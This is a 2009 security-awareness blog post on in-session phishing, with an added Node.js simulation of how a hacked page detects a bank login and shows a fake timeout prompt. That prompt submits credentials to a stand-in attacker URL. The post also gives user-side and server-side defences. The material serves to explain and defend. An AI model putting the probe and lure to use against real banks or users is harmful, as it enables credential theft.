In-Session Phishing – Keep Your Guard Up!
By now, most people know about phishing emails: messages made to look like they come from banks and other financial institutions, sent out in the hope that someone will click the phony link and enter their user name and password.
A newer threat to watch out for is called "in-session phishing." The security firm Trusteer recently published an advisory warning about a technique that can be used to trick you into giving away the user name and password for your web-based financial site while you are actually logged in to it.
How In Session Phishing Works
First, a legitimate website has to be compromised. It does not have to be the bank's own site; any popular site the victim might visit will do, and the hacker plants their malicious code on that site's server. Unfortunately, with the number of unpatched web servers out there, that is a real possibility.
The second part of the attack takes place as a customer goes to their financial institution's site and logs in normally to a secure session. So far, so good. The problem happens when the user, still logged in to the bank, opens another tab or window and lands on the hacked site. Code on that page uses a JavaScript trick, one that works in the most popular browsers, to find out whether the user is currently logged in to the bank. If the answer is "yes," the page displays a phony but convincing message: "Your session for ABC Bank has timed out. Please enter your user name and password to continue." It is the hacked site, not the bank, that shows this message, so anything typed into it goes straight to the criminals. If the user enters their information, their user name and password are stolen. Bad news, indeed!
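To make the mechanism concrete, here is an added example (it is not code from this post or from Trusteer's advisory). It simulates, in Node, one way a page on a hacked site can learn whether the visitor is logged in to a bank: the page includes a script from the bank, the browser attaches the bank's cookies to that request, and the script's content depends on whether there is a session. The bank name, the /session-status.js endpoint, the "session" cookie, and the attacker's collection URL are all hypothetical stand-ins; the "hardened" bank function shows the fix on the bank's side.

```javascript
// Added example for this post (not code from PreparedPC or Trusteer).
// Simulates the login-state probe behind in-session phishing.
// All names (bank.example, /session-status.js, the "session" cookie,
// attacker.example) are hypothetical, constructed stand-ins.

// ---------- Bank side (simulated) ----------
// Constructed sample of the bank's session store.
const VALID_SESSIONS = new Set(["sess-7f3a"]);

// Leaky version: the response to GET /session-status.js depends on login
// state. Logged-in users get a script that defines a global; everyone else
// is redirected to the login page (an HTML document, which fails as a script).
function bankSessionScript(cookies) {
  if (VALID_SESSIONS.has(cookies.session)) {
    return { status: 200, body: "var accountReady = true;" };
  }
  return { status: 302, location: "/login", body: "" };
}

// Hardened version: the script is identical whether or not the caller is
// logged in, so a <script> include from another origin learns nothing.
function hardenedBankSessionScript(cookies) {
  return { status: 200, body: "var widgetLoaded = true;" };
}

// ---------- Attacker side (simulated) ----------
// Stands in for the browser handling
//   <script src="https://bank.example/session-status.js"></script>
// on the hacked page and then checking window.accountReady.
// A non-200 (or non-script) response never defines the global.
function simulateScriptInclude(response) {
  if (response.status !== 200) return false;
  const run = new Function(
    response.body +
      "\nreturn typeof accountReady !== 'undefined' && accountReady === true;"
  );
  return run();
}

// The phony prompt from the post, rendered as data. A real attack would
// inject it into the page as an overlay; the form posts to the attacker.
function buildFakeTimeoutPrompt(bankName) {
  return {
    title: "Your session for " + bankName + " has timed out.",
    message: "Please enter your user name and password to continue.",
    fields: ["username", "password"],
    submitsTo: "https://attacker.example/collect", // hypothetical
  };
}

// Full decision: probe first, and only show the prompt to a victim who is
// actually logged in. Someone with no bank session open would know the
// "timeout" message is nonsense, so the lure is never shown to them.
function inSessionPhish(bankScriptEndpoint, cookies) {
  const loggedIn = simulateScriptInclude(bankScriptEndpoint(cookies));
  return loggedIn ? buildFakeTimeoutPrompt("ABC Bank") : null;
}

// Stand-alone demo.
if (typeof require !== "undefined" && require.main === module) {
  const victim = { session: "sess-7f3a" };
  console.log("leaky bank, logged in:   ", inSessionPhish(bankSessionScript, victim) !== null);
  console.log("leaky bank, logged out:  ", inSessionPhish(bankSessionScript, {}) !== null);
  console.log("hardened bank, logged in:", inSessionPhish(hardenedBankSessionScript, victim) !== null);
}
```

The point of the hardened function is that the leak comes from serving a state-dependent response to a request any site can trigger. This post predates it, but the defense browsers later added is the cookie attribute SameSite (Lax or Strict), which stops the bank's cookie from being sent on a cross-site script include in the first place, so the probe gets the logged-out answer no matter what.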
How Can I Protect Myself?
Besides the basics of keeping your computer patched with the latest updates and keeping your antivirus software up to date, protect yourself by simply knowing whether you are still logged in to your financial website, and by finishing your business and logging out rather than leaving the session open while you browse elsewhere. A genuine timeout notice appears on the bank's own page, in the tab showing the bank's address; a request for your user name and password that pops up while you are on some other site is a red flag, so close it and go back to the bank's tab (or type the bank's address yourself) to check. This is the electronic equivalent of knowing whether someone is standing behind you at the ATM, watching you enter your PIN.
Stay vigilant so that you can stay ahead of the bad folks who hope to trick you out of your identity. Your online financial accounts may depend on it.
This entry was posted by PreparedPC on January 15, 2009 at 5:56 pm, and is filed under Web Browsing.